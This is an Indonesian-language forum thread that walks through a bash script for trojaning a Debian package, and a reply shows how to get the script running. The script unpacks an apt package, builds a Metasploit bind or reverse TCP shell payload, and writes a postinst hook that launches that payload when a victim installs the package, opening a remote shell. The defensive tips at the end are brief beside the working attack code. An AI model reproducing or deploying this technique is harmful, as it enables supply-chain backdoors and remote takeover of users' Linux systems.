08-20-2012, 10:53 PM
Kemungkinan adanya penyusupan backdoor dengan berbagai metode ternyata memungkinkan untuk file debian. Perlu hati-hati karena penyusupan dengan backdoor yang memiliki berbagai tipe bahkan membuka remote shell aktif linux pada linux server dengan kompetibel terbaru sekalipun... Ane jalan-jalan ke google ketemu script sh ( bash ) sederhana yang mampu membuat backdoor sekaligus mengeskusi listener multi handler dari metasploit.
Jika kita melihat
POC :
1. Jalankan script dalam bentuk sh ( chmod +x atau chmod 777 )
2. Isikan opsi2nya sangat mudah bro :d
3. Proses backdoor akan terbentuk dengan sendirinya ...
4. Meterpreter akan terbuka dengan sendirinya ketika si korban melakukan penginstallan paket debian = [ dpkg -i ]
Ane ujicoba dengan 2 server ( ip publik ) - jenis operating system linux ubuntu server x32 12.04
Analisa script :
Unpack proses ... dpkg -x [ nama file ] [output]
ini digunakan agar backdoor dapat di masukan tanpa terlihat file control di copy untuk membuat paket baru.
Pembuatan backdoor dengan MSPAYLOAD .. hmmm payload,ip(LHOST) dan port(LPORT) .. kyknya ini pembuatan standart backdoor
Post-install (postints) script di bangun dari sini
Untuk itu ane lampirkan codingan dan ini sumber asli ... tested sih work 100% .. mungkin nnti kita update untuk cara menjaga atau mengecek debian file maintainer
Kesimpulan :
1. Jangan pernah mengambil paket file dari suatu repo yang tidak di percaya dan tidak jelas
2. Periksalah terlebih dahulu kemana dia menginstall paket debian tersebut ( dpkg -x )
3. Pasang antivirus dan berbagai software malware analisys lainnya.
Contoh debian paket yang di pakai pada percobaan kli ini saya tambahkan sebagai attachment .. mari kita posting hasil malware analisanya disini
original post & code / author
http://pastebin.com/f769fc3de
Original post : http://zico-ekel.com/sebuah-file-paket-d...-backdoor/
Jika kita melihat
POC :
1. Jalankan script dalam bentuk sh ( chmod +x atau chmod 777 )
2. Isikan opsi2nya sangat mudah bro :d
3. Proses backdoor akan terbentuk dengan sendirinya ...
4. Meterpreter akan terbuka dengan sendirinya ketika si korban melakukan penginstallan paket debian = [ dpkg -i ]
Ane ujicoba dengan 2 server ( ip publik ) - jenis operating system linux ubuntu server x32 12.04
Analisa script :
Unpack proses ... dpkg -x [ nama file ] [output]
ini digunakan agar backdoor dapat di masukan tanpa terlihat file control di copy untuk membuat paket baru.
Code:
dpkg -x $tmpdir/$package* $workdir
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/controlPembuatan backdoor dengan MSPAYLOAD .. hmmm payload,ip(LHOST) dan port(LPORT) .. kyknya ini pembuatan standart backdoor
Code:
if [ "$choice" -eq 1 ]; then
payload="linux/x86/shell/bind_tcp"
echo "Enter IP:"
read rhostIP
echo "Enter port:"
read bindport
options="RHOST=$rhostIP LPORT=$bindport"
else
if [ "$choice" -eq 2 ]; then
payload="linux/x86/shell/reverse_tcp"
echo "Enter IP:"
read lhostIP
echo "Enter port:"
read revport
options="LHOST=$lhostIP LPORT=$revport"
fi
fiPost-install (postints) script di bangun dari sini
Code:
echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinstUntuk itu ane lampirkan codingan dan ini sumber asli ... tested sih work 100% .. mungkin nnti kita update untuk cara menjaga atau mengecek debian file maintainer
Kesimpulan :
1. Jangan pernah mengambil paket file dari suatu repo yang tidak di percaya dan tidak jelas
2. Periksalah terlebih dahulu kemana dia menginstall paket debian tersebut ( dpkg -x )
3. Pasang antivirus dan berbagai software malware analisys lainnya.
Contoh debian paket yang di pakai pada percobaan kli ini saya tambahkan sebagai attachment .. mari kita posting hasil malware analisanya disini
original post & code / author
http://pastebin.com/f769fc3de
(08-24-2012, 05:04 AM)iKONspirasi Wrote: btw untuk yang masih mengalami error dalam menjalankan skrip ini coba dilihat dulu di source filenya ada folder:
msfdir="/opt/metasploit3/msf3" ga?
diganti dulu dengan folder metasploit yang terinstall di OS masing2
karena ini exploit tahun 2010 jadi ane rasa metasploit masih versi 3
dan bagi yang mengalami masalah seperti ini: (skrip ane simpan ke file deb-exploit.sh)
Code:root@ikons:~/Pentest$ ./deb-exploit.sh
bash: ./deb-exploit.sh: /bin/sh^M: bad interpreter: No such file or directory
atau
Code:root@iKONs:~/Pentest# sh deb-exploit.sh
: not found.sh: 2: deb-exploit.sh:
: not found.sh: 6: deb-exploit.sh:
: not found.sh: 9: deb-exploit.sh:
: not found.sh: 11: deb-exploit.sh:
deb-exploit.sh: 143: deb-exploit.sh: Syntax error: end of file unexpected (expecting "then")
ternyata masalahnya adalah di file tersebut yang ternyata disimpan dalam bentuk format DOS/MAC (ane ga copas dari link pastebin tapi klik Download)
untuk mengatasinya tinggal install dos2unix (apt-get install dos2unix) kemudian:
Code:root@iKONs:~/Pentest# dos2unix -o deb-exploit.sh
dos2unix: converting file deb-exploit.sh to Unix format ...
setelah itu jalankan filenya:
Code:root@iKONs:~/Pentest# sh deb-exploit.sh
deb-exploit.sh: 12: deb-exploit.sh: [[: not found
#####################################################################
Script to generate a Debian package trojan using a Metasploit payload
#####################################################################
Please enter the name of the APT package you wish to trojan:
Use apt-cache search <package> for ideas :)
VOILA
Original post : http://zico-ekel.com/sebuah-file-paket-d...-backdoor/
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only